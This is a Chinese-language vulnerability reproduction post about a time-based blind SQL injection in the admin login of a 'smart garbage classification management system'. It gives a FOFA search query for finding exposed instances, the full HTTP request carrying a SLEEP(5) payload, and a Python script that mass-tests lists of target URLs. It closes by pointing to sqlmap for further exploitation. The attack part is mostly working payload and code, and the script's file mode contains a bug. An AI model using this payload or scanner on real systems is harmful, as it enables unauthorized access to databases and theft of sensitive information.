漏洞简介
智慧垃圾分类管理系统应用于智能垃圾桶、厨余垃圾桶、智能果皮箱生产的企业,依托AI技术、人脸识别、移动互联网、大数据、物联网等。该系统存在sql注入漏洞,攻击者可获取数据库敏感信息。
FOFA语句
title="智能垃圾分类管理系统"
漏洞影响
全版本?
漏洞复现
在登陆框抓包
POST /ghc_master/data/action.admindata.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 96 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224
如果在5秒后返回了1,说明存在sql注入漏洞
python脚本,可批量进行检测
import requests import sys import argparse from requests.packages.urllib3.exceptions import InsecureRequestWarning #消除警告 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 消除警告 def lemonlove7(): print('+++FOFA:title="智能垃圾分类管理系统"') print('+++python xxx.py -u/--url http://xxx.xxx.xxx.xxx') print('+++python xxx.py -f/--file xxx.txt') print('+++作者:lemonlove7') print('-----------------------------------------------------') if len(sys.argv) == 1: lemonlove7() sys.exit() p = argparse.ArgumentParser(description='lemonlove7') p.add_argument('-u','--url',help='目标url',default='') p.add_argument('-f','--file',help='文件',default='') xp = p.parse_args() url = xp.url file = xp.file data = "do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224" headers = { 'User-Agent': 'Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/90.0.4430.212Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 'Cookie': 'PHPSESSID=hfq66id9bum90sovr9gmn7klde' } if url !='': url1 = url try: url = url+'/ghc_master/data/action.admindata.php' r = requests.post(url = url ,headers =headers,data=data ,timeout = 15,verify=False) if r.text =='1' and r.status_code == 200: print(url1 + '存在sql注入') else: print(url1+'不存在aql注入') except: print(url1+"异常") if file!= '': f = open(file,'r+') for i in f.readlines(): url=i.strip() if url.startswith('http:') != 1 and url.startswith('https:') != 1: url = 'http://' + url url =url url1 = url try: t = url + '/ghc_master/data/action.admindata.php' r =requests.post(url=url,data=data,headers=headers,timeout=15,verify=False) if r.status_code == 200 and '1' in r.text: print(url1+'存在sql注入') else: print(url1+'不存在注入') except: print(url1+'异常')
运行效果如下
用sqlmap进行sql注入
